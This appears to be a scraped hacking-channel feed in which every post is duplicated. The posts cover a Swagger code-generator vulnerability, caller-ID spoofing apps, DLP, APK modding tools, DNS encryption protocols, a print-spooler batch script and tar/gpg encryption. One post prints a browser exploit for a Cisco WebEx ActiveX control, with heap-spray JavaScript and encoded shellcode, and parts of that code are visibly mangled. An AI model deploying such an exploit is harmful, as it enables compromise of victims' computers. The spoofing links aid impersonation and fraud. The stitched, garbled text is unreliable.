β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What about Swagger JSON high-risk vulnerability was found in Java/PHP/NodeJS/Ruby or hit :
Attackers use the vulnerability to implant malicious code in the Swagger JSON file to achieve remote execution. The vulnerability exists in OpenAPI (Swagger Code Generator), which is a parameter injection vulnerability. All applications that integrate OpenAPI will be affected.
1) Recently, a vulnerability that exists widely in popular languages ββsuch as Java, PHP, NodeJS and Ruby was discovered. The vulnerability exists in OpenAPI (Swagger Code Generator). It is a parameter injection vulnerability, and all applications that integrate Open API will be affected.
High-risk vulnerabilities are found, Java/PHP/NodeJS/Ruby development applications or the trick
2) Attackers can use this vulnerability to implant malicious code in Swagger JSON files for remote execution. It is worth noting that the details and fixes of the vulnerability have been disclosed as early as April 2016, but it does not seem to have received enough attention from the maintainers of Swagger because they have never responded to this matter.
For the sake of safety, relevant developers and technicians should expedite the deployment of vulnerability fixes, so as to eliminate the potential threat of the vulnerability as soon as possible.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What about Swagger JSON high-risk vulnerability was found in Java/PHP/NodeJS/Ruby or hit :
Attackers use the vulnerability to implant malicious code in the Swagger JSON file to achieve remote execution. The vulnerability exists in OpenAPI (Swagger Code Generator), which is a parameter injection vulnerability. All applications that integrate OpenAPI will be affected.
1) Recently, a vulnerability that exists widely in popular languages ββsuch as Java, PHP, NodeJS and Ruby was discovered. The vulnerability exists in OpenAPI (Swagger Code Generator). It is a parameter injection vulnerability, and all applications that integrate Open API will be affected.
High-risk vulnerabilities are found, Java/PHP/NodeJS/Ruby development applications or the trick
2) Attackers can use this vulnerability to implant malicious code in Swagger JSON files for remote execution. It is worth noting that the details and fixes of the vulnerability have been disclosed as early as April 2016, but it does not seem to have received enough attention from the maintainers of Swagger because they have never responded to this matter.
For the sake of safety, relevant developers and technicians should expedite the deployment of vulnerability fixes, so as to eliminate the potential threat of the vulnerability as soon as possible.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME REAL FAKE CALL APPS "
https://play.google.com/store/apps/details?id=com.gogii.textplus
https://play.google.com/store/apps/details?id=com.talkatone.android
https://play.google.com/store/apps/details?id=com.tiggzi.project54500
https://play.google.com/store/apps/details?id=eu.mobitop.fakemeacall
https://play.google.com/store/apps/details?id=me.dingtone.app.im
https://www.spoofcard.com/
https://play.google.com/store/apps/details?id=com.fakecallgame&hl=en&gl=US
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME REAL FAKE CALL APPS "
https://play.google.com/store/apps/details?id=com.gogii.textplus
https://play.google.com/store/apps/details?id=com.talkatone.android
https://play.google.com/store/apps/details?id=com.tiggzi.project54500
https://play.google.com/store/apps/details?id=eu.mobitop.fakemeacall
https://play.google.com/store/apps/details?id=me.dingtone.app.im
https://www.spoofcard.com/
https://play.google.com/store/apps/details?id=com.fakecallgame&hl=en&gl=US
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Google Play
textPlus: Text Message + Call - Apps on Google Play
Unlimited messages, WiFi Calling, Texting app. Text now with Second Phone Number
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦DLP ALL YOU NEED TO KNOW :
A) How is DLP used?
1) Most often, DLP security software is located in a peripheral device such as a firewall or spam filter.
2) These devices scan outbound traffic to ensure that no sensitive data is sent outside the network.
3) DLP is typically configured to track emails, instant messages, file transfers, and cloud file storage, triggering transfer stops when sensitive data is detected.
4) It can also be configured to allow specific individuals or groups to bypass DLP filters.
5) These exceptions are usually combined with technologies such as email encryption to prevent unauthorized access to content without decryption.
B) What industries is DLP used in?
1) The need for DLP software varies from industry to industry and really depends on the data processing rules your business must follow.
2) Data loss prevention software is most prevalent in healthcare and finance.
3) Electronic Data Loss Prevention can dramatically improve your information security and even help you comply with legal requirements.
4) If you have sensitive or protected information, you should consider adding a DLP software solution to your infrastructure.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦DLP ALL YOU NEED TO KNOW :
A) How is DLP used?
1) Most often, DLP security software is located in a peripheral device such as a firewall or spam filter.
2) These devices scan outbound traffic to ensure that no sensitive data is sent outside the network.
3) DLP is typically configured to track emails, instant messages, file transfers, and cloud file storage, triggering transfer stops when sensitive data is detected.
4) It can also be configured to allow specific individuals or groups to bypass DLP filters.
5) These exceptions are usually combined with technologies such as email encryption to prevent unauthorized access to content without decryption.
B) What industries is DLP used in?
1) The need for DLP software varies from industry to industry and really depends on the data processing rules your business must follow.
2) Data loss prevention software is most prevalent in healthcare and finance.
3) Electronic Data Loss Prevention can dramatically improve your information security and even help you comply with legal requirements.
4) If you have sensitive or protected information, you should consider adding a DLP software solution to your infrastructure.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 BEST APK MODDING & EDITORS TOOLS :
http://www.vaibhavpandey.com/apkstudio/
https://kefir500.github.io/apk-icon-editor/download/
https://sourceforge.net/projects/apkfilemanager/
https://apk-easy-tool.en.lo4d.com/download
https://apkeditorpro.com/apk-editor-pro-apk-download/
https://ibotpeaches.github.io/Apktool/
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 BEST APK MODDING & EDITORS TOOLS :
http://www.vaibhavpandey.com/apkstudio/
https://kefir500.github.io/apk-icon-editor/download/
https://sourceforge.net/projects/apkfilemanager/
https://apk-easy-tool.en.lo4d.com/download
https://apkeditorpro.com/apk-editor-pro-apk-download/
https://ibotpeaches.github.io/Apktool/
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Vaibhavpandey
APK Studio | Cross platform, Open-Source IDE for Android Reverse-Engineering
Open-source, cross platform Qt based IDE for reverse-engineering Android application packages. It features a friendly IDE-like layout including code editor with syntax highlighting support for *.smali code files.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How DNS over HTTPS, DNSSEC, DNSCrypt, DNS over TLS compare
Several protocols are available to encrypt DNS requests. DNS over HTTPS (DoH) is currently the best supported on client software, which is what this article is about. To navigate in terms, consider the brief characteristics of each of the protocols.
DNS over HTTPS (DoH) is a protocol for performing DNS resolution over HTTPS. The goal of this technique is to improve user privacy and security by preventing the interception and manipulation of DNS data through a broker attack.
DNS over TLS (DoT) is a proposed standard protocol for performing remote DNS resolution using TLS. The goal of this technique is to improve user privacy and security by preventing the interception and manipulation of DNS data through a broker attack.
DNSSEC (Domain Name System Security Extensions) is a set of extensions to the IETF DNS protocol that minimize attacks related to DNS spoofing when resolving domain names. It aims to provide DNS clients (the English term resolver) with authentic responses to DNS requests (or authentic information about the fact that there is no data) and ensure their integrity. This uses public key cryptography.
DNSCrypt is a network protocol that authenticates and encrypts Domain Name System (DNS) traffic between a user's computer and recursive name servers. It was originally developed by Frank Denis and Yecheng Fu.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How DNS over HTTPS, DNSSEC, DNSCrypt, DNS over TLS compare
Several protocols are available to encrypt DNS requests. DNS over HTTPS (DoH) is currently the best supported on client software, which is what this article is about. To navigate in terms, consider the brief characteristics of each of the protocols.
DNS over HTTPS (DoH) is a protocol for performing DNS resolution over HTTPS. The goal of this technique is to improve user privacy and security by preventing the interception and manipulation of DNS data through a broker attack.
DNS over TLS (DoT) is a proposed standard protocol for performing remote DNS resolution using TLS. The goal of this technique is to improve user privacy and security by preventing the interception and manipulation of DNS data through a broker attack.
DNSSEC (Domain Name System Security Extensions) is a set of extensions to the IETF DNS protocol that minimize attacks related to DNS spoofing when resolving domain names. It aims to provide DNS clients (the English term resolver) with authentic responses to DNS requests (or authentic information about the fact that there is no data) and ensure their integrity. This uses public key cryptography.
DNSCrypt is a network protocol that authenticates and encrypts Domain Name System (DNS) traffic between a user's computer and recursive name servers. It was originally developed by Frank Denis and Yecheng Fu.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Example code of cracked BAT batch source code in pseudo EXE :
@echo off
title [One-key clearing of print tasks] BY: wnsdt
color 2f
echo.&echo.&echo.
echo Description (2011.10.11):
echo.&echo.
echo This tool can quickly clear unresponsive printing tasks and solve problems that cannot be printed problem!
echo.
echo If you connect to a printer shared on the network, please run this tool on that computer!
echo.&echo.
echo --------------------------------------------- -------------------
echo.
Echo leave a message on Weibo if there is a problem <a href="http://t.qq.com/wnsdt_kk">http:// t.qq.com/wnsdt_kk</a>
echo.&echo.&echo.&echo.&echo.&echo.
echo Press any key to start, exit, please close
pause>nul 2>nul
cls
echo.&echo.&echo.&echo.&echo. &echo.
echo will be cleaned up later, please print again...
net stop spooler>nul 2>nul
del %systemroot%\System32\spool\PRINTERS\*.* /q /s /f>nul 2>nul
sc config spooler start= auto>nul 2>nul
net start spooler>nul 2 >nul
exit
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Example code of cracked BAT batch source code in pseudo EXE :
@echo off
title [One-key clearing of print tasks] BY: wnsdt
color 2f
echo.&echo.&echo.
echo Description (2011.10.11):
echo.&echo.
echo This tool can quickly clear unresponsive printing tasks and solve problems that cannot be printed problem!
echo.
echo If you connect to a printer shared on the network, please run this tool on that computer!
echo.&echo.
echo --------------------------------------------- -------------------
echo.
Echo leave a message on Weibo if there is a problem <a href="http://t.qq.com/wnsdt_kk">http:// t.qq.com/wnsdt_kk</a>
echo.&echo.&echo.&echo.&echo.&echo.
echo Press any key to start, exit, please close
pause>nul 2>nul
cls
echo.&echo.&echo.&echo.&echo. &echo.
echo will be cleaned up later, please print again...
net stop spooler>nul 2>nul
del %systemroot%\System32\spool\PRINTERS\*.* /q /s /f>nul 2>nul
sc config spooler start= auto>nul 2>nul
net start spooler>nul 2 >nul
exit
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit :
<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit :
<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π How to create compressed encrypted archives with tar and gpg :
1) How to create a compressed archive
Before discussing creating encrypted archives, let's first take a look at how to create compressed tar archives.
2) Suppose you have a directory named folder that you want to archive, enter the following command:
$ tar -cvzf folder.tar.gz folder
The -c flag is used to create an archive, -v is used for verbose output so that we have visual feedback that lets us know that this is happening, and -z is used to compress the archive to make it smaller.
3) To unpack and extract this archive later, you must enter the following command.
$ tar -xvzf folder.tar.gz
the -x flag is used for extracting the archive, -v for verbose extraction, and -z for unpacking the archive.
πΊ How to Archive Files and Folders in Linux [Hint for Beginners]
π¦ How to create an encrypted archive ?
1) Now that we have covered creating an archive using tar, let's see how to create an encrypted archive by adding gpg to it.
2) You can use key based encryption, password based encryption, or a combination of both.
π¦How to encrypt / decrypt a file in Linux using gpg (Kali Linux)
π How to generate GPG keys on Linux
therefore, we'll look at password-based encryption here.
To create an encrypted compressed archive of a directory named folder, enter the following command.
$ tar -cvzf - folder | gpg -c > folder.tar.gz.gpg
1) All tar flags are the same as in our previous example.
The only difference is that instead of specifying the filename for our archive in the tar command, we are specifying so that we can pipe the output of the tar command to gpg.
2) We then proceed to do just that, and the gpg's -c flag indicates that we want to encrypt the file with a symmetric cipher using the passphrase as we indicated above.
3) Finally, we redirect the output to a file named folder.tar.gz.gpg using>.
After entering this command, you will be prompted for the passphrase that you want to use to encrypt your data.
4) If you dislike this behavior and prefer to include the passphrase in your command, you can add the --passphrase flag after -c, as shown below.
$ tar -cvzf - folder | gpg -c --passphrase yourpassword > folder.tar.gz.gpg
5) To decrypt, unpack and extract this archive later, you must enter the following command.
$ gpg -d folder.tar.gz.gpg | tar -xvzf -
The -d flag tells gpg that we want to decrypt the contents of the file folder.tar.gz.gpg.
We then pass this to the tar command.
The -x flag is used to extract the archive transferred from gpg, -v for verbose extraction, -z for unpacking the archive.
How to create multiple separate encrypted directory archives
The examples above assume we want to create a single encrypted archive based on one directory. H
then what if we have a directory filled with multiple subdirectories, but we want to create a separate encrypted archive for each directory?
We can use a bash for loop.
Just go to the directory containing the subdirectories for which you want to create separate archives and enter the following command.
$ for i in * ; do tar -cvzf - "$i" | gpg -c --passphrase yourpassword > "$i".tar.gpg; done
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π How to create compressed encrypted archives with tar and gpg :
1) How to create a compressed archive
Before discussing creating encrypted archives, let's first take a look at how to create compressed tar archives.
2) Suppose you have a directory named folder that you want to archive, enter the following command:
$ tar -cvzf folder.tar.gz folder
The -c flag is used to create an archive, -v is used for verbose output so that we have visual feedback that lets us know that this is happening, and -z is used to compress the archive to make it smaller.
3) To unpack and extract this archive later, you must enter the following command.
$ tar -xvzf folder.tar.gz
the -x flag is used for extracting the archive, -v for verbose extraction, and -z for unpacking the archive.
πΊ How to Archive Files and Folders in Linux [Hint for Beginners]
π¦ How to create an encrypted archive ?
1) Now that we have covered creating an archive using tar, let's see how to create an encrypted archive by adding gpg to it.
2) You can use key based encryption, password based encryption, or a combination of both.
π¦How to encrypt / decrypt a file in Linux using gpg (Kali Linux)
π How to generate GPG keys on Linux
therefore, we'll look at password-based encryption here.
To create an encrypted compressed archive of a directory named folder, enter the following command.
$ tar -cvzf - folder | gpg -c > folder.tar.gz.gpg
1) All tar flags are the same as in our previous example.
The only difference is that instead of specifying the filename for our archive in the tar command, we are specifying so that we can pipe the output of the tar command to gpg.
2) We then proceed to do just that, and the gpg's -c flag indicates that we want to encrypt the file with a symmetric cipher using the passphrase as we indicated above.
3) Finally, we redirect the output to a file named folder.tar.gz.gpg using>.
After entering this command, you will be prompted for the passphrase that you want to use to encrypt your data.
4) If you dislike this behavior and prefer to include the passphrase in your command, you can add the --passphrase flag after -c, as shown below.
$ tar -cvzf - folder | gpg -c --passphrase yourpassword > folder.tar.gz.gpg
5) To decrypt, unpack and extract this archive later, you must enter the following command.
$ gpg -d folder.tar.gz.gpg | tar -xvzf -
The -d flag tells gpg that we want to decrypt the contents of the file folder.tar.gz.gpg.
We then pass this to the tar command.
The -x flag is used to extract the archive transferred from gpg, -v for verbose extraction, -z for unpacking the archive.
How to create multiple separate encrypted directory archives
The examples above assume we want to create a single encrypted archive based on one directory. H
then what if we have a directory filled with multiple subdirectories, but we want to create a separate encrypted archive for each directory?
We can use a bash for loop.
Just go to the directory containing the subdirectories for which you want to create separate archives and enter the following command.
$ for i in * ; do tar -cvzf - "$i" | gpg -c --passphrase yourpassword > "$i".tar.gpg; done
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β